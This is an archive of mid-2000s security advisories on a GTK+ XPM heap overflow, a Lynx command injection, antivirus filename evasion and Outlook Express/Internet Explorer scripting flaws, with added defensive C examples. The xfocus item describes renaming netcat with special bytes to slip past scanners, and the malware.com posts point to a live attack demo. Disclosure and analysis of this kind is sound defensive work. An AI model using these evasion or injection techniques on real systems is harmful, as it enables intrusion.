iDEFENSE Security Advisory 11.15.05: Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability

2005-11-15 Thread [EMAIL PROTECTED]

Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability

iDEFENSE Security Advisory 11.15.05
www.idefense.com/application/poi/display?id=339&type=vulnerabilities
November 15, 2005

I. BACKGROUND

GTK+ is a multi-platform toolkit for creating graphical user interfaces.
Offering a complete set of widgets, GTK+ is suitable for projects
ranging from small one-off projects to complete application suites.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in various vendors'
implementations of the GTK+ gdk-pixbuf XPM image rendering library could
allow for arbitrary code execution.

The vulnerability specifically exists due to an integer overflow while
processing XPM files. The following code snippet illustrates the
vulnerability:

if (n_col <= 0 || n_col >= G_MAXINT / (cpp + 1)) {
    g_set_error (error,
                 GDK_PIXBUF_ERROR,
                 GDK_PIXBUF_ERROR_CORRUPT_IMAGE,
                 _("XPM file has invalid number of colors"));
    return NULL;
}
[...]
colors = (XPMColor *) g_try_malloc ((sizeof (XPMColor) * n_col));
[...]


The validity check of n_col is enough to prevent an integer overflow in
the first g_try_malloc, however there is not a proper check for the
second g_try_malloc, which allows an undersized heap buffer to be
allocated, then overflowed while using n_col as an upper bounds in a
copying loop. This can be used to execute arbitrary code via traditional
heap overflow 4 byte write methods or by overwriting adjacent areas of
the heap with important values such as function pointers.
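The following C program is an added example, not gdk-pixbuf code. It models the two allocation sizes the advisory contrasts on a 32-bit build, so the wrap-around reproduces on any host: the quoted n_col check only guarantees that n_col * (cpp + 1) fits in an int, so a colour count that passes it can still make sizeof (XPMColor) * n_col wrap to a tiny value. DEMO_MAXINT stands in for G_MAXINT and the 16-byte entry size is a constructed value, not the real struct size.

```c
/* Added example, not gdk-pixbuf code: models the advisory's two allocation
 * sizes on a 32-bit build so the wrap-around reproduces on any host.
 * DEMO_MAXINT stands in for G_MAXINT; the colour-entry size is a constructed
 * value, not sizeof (XPMColor). */
#include <stdint.h>
#include <stdio.h>

#define DEMO_MAXINT INT32_MAX

/* The n_col check quoted above, as a predicate (1 = accepted). It only
 * guarantees that n_col * (cpp + 1) fits in an int. */
static int ncol_check_original(int32_t n_col, int32_t cpp)
{
    if (cpp < 0) return 0;          /* assumed: cpp validated elsewhere */
    return !(n_col <= 0 || n_col >= DEMO_MAXINT / (cpp + 1));
}

/* Size of the colour table when the product is NOT checked: on a 32-bit
 * size_t the multiplication wraps modulo 2^32 and can come out tiny, which
 * is the undersized buffer the advisory describes. */
static uint32_t color_table_bytes_unchecked(int32_t n_col, uint32_t entry_size)
{
    return (uint32_t)n_col * entry_size;
}

/* Overflow-checked multiply for a 32-bit size type: 1 and the product on
 * success, 0 if a * b does not fit. */
static int mul_u32_checked(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a != 0 && b > UINT32_MAX / a) return 0;
    *out = a * b;
    return 1;
}

/* The check that was missing before the second allocation: validate the
 * byte count against the element size actually allocated, not only against
 * cpp + 1. Returns the byte count, or 0 to reject the image. */
static uint32_t color_table_bytes_checked(int32_t n_col, int32_t cpp,
                                          uint32_t entry_size)
{
    uint32_t bytes;
    if (!ncol_check_original(n_col, cpp)) return 0;
    if (!mul_u32_checked((uint32_t)n_col, entry_size, &bytes)) return 0;
    return bytes;
}

int main(void)
{
    const uint32_t entry = 16;           /* constructed entry size */
    const int32_t cpp = 1;
    const int32_t benign = 100;
    const int32_t hostile = 0x10000000;  /* 2^28 colours: passes the cpp check */

    printf("benign  n_col=%d: checked bytes=%u\n", benign,
           color_table_bytes_checked(benign, cpp, entry));
    printf("hostile n_col=%d: original check=%d unchecked bytes=%u checked bytes=%u\n",
           hostile, ncol_check_original(hostile, cpp),
           color_table_bytes_unchecked(hostile, entry),
           color_table_bytes_checked(hostile, cpp, entry));
    return 0;
}
```

With n_col = 2^28 and cpp = 1 the original predicate accepts the image, the unchecked product is exactly 2^32 and wraps to 0 bytes, and the checked version rejects it; the fix is to bound the allocation by the element size that is actually multiplied, not by an unrelated earlier check.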

III. ANALYSIS

Exploitation could allow for arbitrary code execution in the context of
the user running the affected application. As this library is used in a
variety of applications, this vulnerability could be exploited either
remotely, via a networked application or locally.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in gtk+ 2.4.0
compiled from source. It is suspected that previous versions are also
affected by this vulnerability. The following vendors include
susceptible GTK+ and GdkPixBuf packages within their respective
operating system distributions:

   The Debian Project:
 Debian GNU/Linux 3.0 and 3.1 (all architectures)
   Mandriva (formerly Mandrakesoft):
 Mandriva Linux (formerly Mandrakelinux) 10.0 and 10.1,
 Corporate Server 3.0
   Novell Inc.:
 SuSE Linux 8.2, 9.0, 9.1 and 9.2
   Red Hat Inc.:
 Red Hat Enterprise Linux 2.1, 3, 4,
 Fedora Core 3, 4

V. WORKAROUND

Users should not open untrusted media files.

VI. VENDOR RESPONSE

Red Hat Inc.:

"This issue affects the gtk2 packages as shipped with Red Hat Enterprise
Linux 3 and 4, and the gdk-pixbuf packages as shipped with Red Hat
Enterprise Linux 2.1, 3, and 4.  Updates to these packages are available
at the URL below or by using the Red Hat Network up2date tool.
http://rhn.redhat.com/errata/CVE-2005-3186.html

This issue affects the gtk2 and gdk-pixbuf packages as shipped with
Fedora Core 3 and 4."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3186 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/14/2005  Initial vendor response
11/15/2005  Coordinated public disclosure

IX. CREDIT

infamous41md is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDEFENSE, Inc.




[xfocus-AD-051115] Multiple antivirus failed to scan malicious filename bypass vulnerability

2005-11-15 Thread [EMAIL PROTECTED]
[xfocus-AD-051115] Multiple antivirus failed to scan malicious filename
bypass vulnerability

discovered by [EMAIL PROTECTED]
class: design error
Threat level: medium


Vulnerable anti-virus Engine:

Kaspersky Antivirus
Symantec AntiVirus
F-Prot Antivirus
ClamWin Antivirus
Avast Antivirus
RAV AntiVirus
Microsoft AntiSpyware

tested anti-virus vendor:

Symantec AntiVirus Corporate 8.0
Kaspersky Antivirus Personal Pro 4.5.0.104
Kaspersky Antivirus For MS NTServer 4.5.0.104
F-Prot Antivirus 3.16c
ClamWin Antivirus 0.87
Avast.Professional.Edition.v4.6.603
RAV.AntiVirus.Desktop.v8.6
Microsoft AntiSpyware beta1


1.Summary:


   Windows systems may use many kinds of special characters in a filename;
some anti-virus engines are unable to parse such specially structured
filenames, and thus fail to operate on the file.


2. Detail:

   Demonstration here:

   Choose a malicious file which would be detected, such as nc.exe, and
rename the file to nc??.exe (?? = hex C0 D7 BA DC).

   These malicious files will then not be detected by the antivirus scan.

   Because these special names cannot be typed directly, if you want to
run such a file you should use the following approach:

   [EMAIL PROTECTED]:\Vul\bugtrap]#dir /x

   1998-01-03  14:37            59,392 NC294E~1.EXE nc??.exe

   [EMAIL PROTECTED]:\Vul\bugtrap]#NC294E~1.EXE -help
   [v1.10 NT]
   connect to somewhere:   nc [-options] hostname port[s] [ports] ...
   listen for inbound: nc -l -p port [options] [hostname] [port]
   options:

   Using the MS-DOS (8.3) short name, we can operate on the file with Open,
Read, Write, and duplicate.

   In fact most vendors have a problem parsing this kind of file name: for
instance, right-clicking these kinds of files shows no scan option in the
context menu for Kaspersky antivirus; Symantec AntiVirus Corporate
V10.0.1.1000 detects them but can't remove them; and AVG Anti-Virus lets
them pass under a normal path scan, and can't read the file if the scan
option in the menu is clicked.
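The defender-side counterpart to the demonstration above is to inventory names a scanner may mishandle and fall back to the 8.3 alias. The C program below is an added example, not part of the xfocus advisory: it parses "dir /x" listing lines (assumed column layout: date, time, size or <DIR>, optional 8.3 alias, long name), flags long names containing bytes outside printable ASCII, and reports the alias that can be opened instead. The listing is constructed; the embedded C0 D7 BA DC bytes are the ones the advisory cites.

```c
/* Added example, not from the xfocus advisory: a parser for "dir /x" output
 * that flags long names carrying bytes outside printable ASCII and reports
 * the 8.3 alias a scanner can open instead. The listing below is constructed;
 * the embedded C0 D7 BA DC bytes are the ones the advisory cites. */
#include <stdio.h>
#include <string.h>

#define MAX_NAME 260

typedef struct {
    char short_name[MAX_NAME];  /* 8.3 alias, "" when the column is blank */
    char long_name[MAX_NAME];   /* long name as listed */
    int  suspicious;            /* 1 if long_name has bytes outside 0x20..0x7E */
} DirEntry;

/* 1 if any byte of name is outside printable ASCII (control or high-bit). */
static int name_has_unsafe_bytes(const char *name)
{
    const unsigned char *p = (const unsigned char *)name;
    for (; *p; p++)
        if (*p < 0x20 || *p > 0x7E) return 1;
    return 0;
}

/* Parses one file line of "dir /x" output, assumed to be laid out as
 *   <date> <time> <size or <DIR>> [<8.3 alias>] <long name>
 * with space-separated columns; the alias column is blank when the long
 * name already fits 8.3. Returns 1 for a file entry, 0 for any other line. */
static int parse_dir_x_line(const char *line, DirEntry *e)
{
    char date[16], tm[16], size[32], f4[MAX_NAME];
    const char *rest;
    int consumed = 0;

    memset(e, 0, sizeof *e);
    if (sscanf(line, "%15s %15s %31s %259s%n", date, tm, size, f4, &consumed) != 4)
        return 0;
    if (strlen(date) != 10 || date[4] != '-' || date[7] != '-')
        return 0;                               /* header or summary line */
    rest = line + consumed;
    while (*rest == ' ') rest++;
    if (*rest == '\0') {
        strncpy(e->long_name, f4, MAX_NAME - 1);   /* no alias column */
    } else {
        strncpy(e->short_name, f4, MAX_NAME - 1);
        strncpy(e->long_name, rest, MAX_NAME - 1);
        e->long_name[strcspn(e->long_name, "\r\n")] = '\0';
    }
    e->suspicious = name_has_unsafe_bytes(e->long_name);
    return 1;
}

/* Constructed listing modelled on the advisory's "dir /x" session. */
static const char *const SAMPLE_LISTING[] = {
    " Directory of C:\\Vul\\bugtrap",
    "",
    "1998-01-03  14:37            59,392 NC294E~1.EXE nc\xC0\xD7\xBA\xDC.exe",
    "2005-11-15  09:00            59,392              nc.exe",
    "2005-11-15  09:01    <DIR>          LONGNA~1     long name dir",
    "               3 File(s)        118,784 bytes",
};
#define SAMPLE_LINES (sizeof SAMPLE_LISTING / sizeof SAMPLE_LISTING[0])

/* Fills out[] with entries whose long names carry unsafe bytes and returns
 * the count; out[i].short_name is the alias to open when the long name
 * cannot be handled. */
static int find_suspicious_names(DirEntry *out, int max_out)
{
    int found = 0;
    size_t i;
    for (i = 0; i < SAMPLE_LINES && found < max_out; i++) {
        DirEntry e;
        if (parse_dir_x_line(SAMPLE_LISTING[i], &e) && e.suspicious)
            out[found++] = e;
    }
    return found;
}

/* Convenience accessors over the sample listing. */
static int count_suspicious_in_sample(void)
{
    DirEntry hits[8];
    return find_suspicious_names(hits, 8);
}

static const char *first_suspicious_alias(void)
{
    static DirEntry hits[8];
    return find_suspicious_names(hits, 8) > 0 ? hits[0].short_name : "";
}

int main(void)
{
    DirEntry hits[8];
    int n = find_suspicious_names(hits, 8), i;
    for (i = 0; i < n; i++)
        printf("suspicious long name (%zu bytes), scan via alias %s\n",
               strlen(hits[i].long_name), hits[i].short_name);
    return 0;
}
```

Only the renamed nc entry is flagged; the plain nc.exe and a directory whose long name merely contains spaces are not, which is the distinction a scanner's path handling needs to make before it decides a file is unreadable.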


3. Credits:

   Thanks to [EMAIL PROTECTED] for translating it, and thanks to all members
of the xfocus team and everyone who supports the xfocus team.


4. About xfocus:


Xfocus is a non-profit and free technology organization which was
founded in 1998 in China. We are devoted to the research and demonstration
of weaknesses related to network services and communication security.

homepage http://www.xfocus.org/

-EOF

-- 

Kind Regards,

---
[EMAIL PROTECTED]

XFOCUS Security Team
http://www.xfocus.org



iDefense Security Advisory 11.11.05: Multiple Vendor Lynx Command Injection Vulnerability

2005-11-14 Thread [EMAIL PROTECTED]

Multiple Vendor Lynx Command Injection Vulnerability

iDefense Security Advisory 11.11.05
www.idefense.com/application/poi/display?id=338&type=vulnerabilities
November 11, 2005

I. BACKGROUND

Lynx is a fully-featured WWW client for users running cursor-
addressable, character-cell display devices such as vt100 terminals and
terminal emulators. Lynx supports a number of protocols including HTTP,
HTTPS, gopher, FTP, WAIS, NNTP, finger or cso/ph/qi servers, and
services accessible via logons to telnet, tn3270 or rlogin accounts.

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in various
vendors' implementations of Lynx could allow attackers to execute
arbitrary commands with the privileges of the underlying user.

The problem specifically exists within the feature to execute local
cgi-bin programs via the "lynxcgi:" URI handler. The handler is
generally intended to be restricted to a specific directory or
program(s). However, due to a configuration error on multiple platforms,
the default settings allow for arbitrary websites to specify commands to
run as the user running Lynx.

III. ANALYSIS

Successful exploitation of the described vulnerability allows remote
attackers to execute arbitrary commands with the privileges of the
underlying user. Exploitation requires that an attacker convince a
target user to follow a malicious link from within a vulnerable version
of Lynx. The "lynxexec" and "lynxprog" URI handlers can also be used to
trigger the issue. However, they are rarely compiled into the Lynx
binary.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in the latest
stable release of Lynx, version 2.8.5. It is suspected that earlier
versions are also affected. The following vendors include susceptible
Lynx packages within their respective distributions:

   * Red Hat Inc.
   * Gentoo Foundation Inc.
   * Mandriva SA

Other vendors are suspected as also being vulnerable. The following
vendors include Lynx packages that are not susceptible to exploitation
as the "lynxcgi" feature is not compiled into Lynx by default:

   * The FreeBSD Project
   * OpenBSD

V. WORKAROUND

Disable "lynxcgi" links by specifying the following directive in
lynx.cfg:

   TRUSTED_LYNXCGI:none

VI. VENDOR RESPONSE

Development version 2.8.6dev.15 has been released to address this issue
and is available from the following URLs:

 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.Z
 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.bz2
 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.gz
 http://lynx.isc.org/current/lynx2.8.6dev.15.zip

Alternately, an incremental patch is available at:

 http://lynx.isc.org/current/2.8.6dev.15.patch.gz

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-2929 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/28/2005  Initial vendor response
11/11/2005  Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.


X. LEGAL NOTICES

Copyright © 2005 iDEFENSE, Inc.




TEXT/PLAIN: ALERT("OUTLOOK EXPRESS")

2003-07-25 Thread [EMAIL PROTECTED]


Friday, July 25, 2003

Active Scripting and HTML in a plain text mail message: 

MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7bit
X-Source: 25.07.03 http://www.malware.com

foo


The above is a legitimate RFC822 mail message in plain text. 
Ordinarily one would require an html mail message [Content-Type: 
text/html;] to parse html and scripting. The above functions under a 
plain text mail message in Outlook Express 6.00 and Outlook Express 
5.5 [perhaps others]. Outlook Express 6 has restricted zone as default 
as well as an option to read messages in plain text [use it !]. Other 
versions do not.

This was definitely fixed way back when:

[see: http://www.securityfocus.com/bid/3334 ]

And now appears to be back.

It can be of interest to admins who filter based on content type at 
the gateway, as well as newsgroup operators who do the same [less so 
as comprehensive].
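For the gateway admins the post addresses, the point is that a rule keyed on the declared Content-Type never sees this message. The C program below is an added example, not from the malware.com post: it parses a constructed RFC822 message whose headers match the one above, applies a content-type rule and a body-inspection rule to it, and shows that only the latter blocks it. The "<script>" body stands in for the scripting the post says runs in a text/plain message.

```c
/* Added example, not from the malware.com post: a minimal gateway-side check
 * showing why a filter keyed on the declared Content-Type misses a message
 * like the one above. The message is constructed; its "<script>" body stands
 * in for the scripting the post says runs in a text/plain message. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

static const char SAMPLE_MESSAGE[] =
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain;\r\n"
    "Content-Transfer-Encoding: 7bit\r\n"
    "\r\n"
    "foo <script>alert(\"OUTLOOK EXPRESS\")</script>\r\n";

/* 1 if s starts with prefix, ignoring case. */
static int ci_prefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (!*s || tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Case-insensitive substring search (strcasestr is not portable C). */
static const char *find_ci(const char *hay, const char *needle)
{
    for (; *hay; hay++)
        if (ci_prefix(hay, needle)) return hay;
    return NULL;
}

/* Pointer to the body, i.e. past the first blank line; NULL if none. */
static const char *message_body(const char *msg)
{
    const char *p = strstr(msg, "\r\n\r\n");
    if (p) return p + 4;
    p = strstr(msg, "\n\n");
    return p ? p + 2 : NULL;
}

/* Copies the value of header `name` (case-insensitive) into out; 1 if found.
 * Looks only at the header section; no folded-line handling. */
static int header_value(const char *msg, const char *name, char *out, size_t outsz)
{
    const char *body = message_body(msg);
    const char *line = msg;
    size_t n = strlen(name);

    while (*line && (!body || line < body)) {
        const char *eol = strpbrk(line, "\r\n");
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (ci_prefix(line, name) && line[n] == ':') {
            const char *v = line + n + 1;
            size_t vlen;
            while (*v == ' ' || *v == '\t') v++;
            vlen = len - (size_t)(v - line);
            if (vlen >= outsz) vlen = outsz - 1;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        if (!eol) break;
        line = eol;
        while (*line == '\r' || *line == '\n') line++;
    }
    return 0;
}

/* Policy A: the content-type gateway rule the post mentions. Blocks only
 * when the declared type is text/html. Returns 1 = block. */
static int block_by_content_type(const char *msg)
{
    char ct[128];
    if (!header_value(msg, "Content-Type", ct, sizeof ct)) return 0;
    return ci_prefix(ct, "text/html");
}

/* Policy B: inspect the body regardless of declared type. A small tag
 * heuristic is enough to show the difference. Returns 1 = block. */
static int block_by_body_content(const char *msg)
{
    static const char *const markers[] = { "<script", "<iframe", "<object" };
    const char *body = message_body(msg);
    size_t i;
    if (!body) return 0;
    for (i = 0; i < sizeof markers / sizeof markers[0]; i++)
        if (find_ci(body, markers[i])) return 1;
    return 0;
}

/* Declared type of the sample, for callers that cannot pass a buffer. */
static const char *sample_content_type(void)
{
    static char ct[128];
    return header_value(SAMPLE_MESSAGE, "Content-Type", ct, sizeof ct) ? ct : "";
}

int main(void)
{
    printf("declared type: %s\n", sample_content_type());
    printf("content-type filter blocks: %d\n", block_by_content_type(SAMPLE_MESSAGE));
    printf("body inspection blocks:     %d\n", block_by_body_content(SAMPLE_MESSAGE));
    return 0;
}
```

The declared type is honoured by the filter and ignored by the client, so any control that trusts the sender's Content-Type is bypassed; inspecting the body (or, on the client side, the plain-text reading option the post recommends) is what actually closes the gap.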

Notes:

1. We're working on html in the 'plain text' zone of OE6 next.
2. None.


End Call

-- 
http://www.malware.com







Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !

2003-07-23 Thread [EMAIL PROTECTED]


Wednesday, 23 July, 2003

Yet another quaint lead-up to "silent delivery and installation of an 
executable on a target computer. No client input other than viewing a 
web page" !

This is getting boring.

A myriad of technical hurdles have been recently placed to disallow 
access to files and folders on the local machine from the internet.  
Previously simple redirects could defeat that, but that too has been 
eliminated.

Coupled with a myriad of existing possibilities of placing arbitrary 
files in known locations on the local machine, along with perhaps 
several other well known applications that create sensitive files in 
known locations on the local machine, accessing all of these with our 
trusty browser commonly known as IE, leaves us with ample opportunity 
to wreak further havoc on the unsuspecting customers of the 
manufacturer, one "Microsoft".

For an ever increasing list of component possibilities seek here:

http://www.pivx.com/larholm/unpatched/

Once again the problem lies within our trusty and battle-hardened 
Windows Media Player. Two second creation of Zero second URL flip to 
local machine, allows us the desired access.  Whether this is the 
result of a 'trusted' media file or not is unclear. Not important. 
Custom crafted media files seem to fail.

Working Example:

Fails on WMP 9 but fully functional on all others regardless of 
operating system:

ATTENTION: demo is merely first step. Plug 'n Play any of the 
available components in the listing above for maximum results:

http://www.malware.com/once.again!.html

Notes:

1. We appear to be going around and around in circles now
2. We see no possibility of ever expending one red cent to this 
particular toy manufacturer. As such we are stuck with what we have.  
We would be interested in thoroughly examining the latest and 
greatest toys created by these people and should someone feel like 
lending us a couple shiny new machines with default installs of the 
latest and greatest toys, we'll be happy to come to some sort of mutually 
beneficial arrangement.
3. None.


-- 
http://www.malware.com
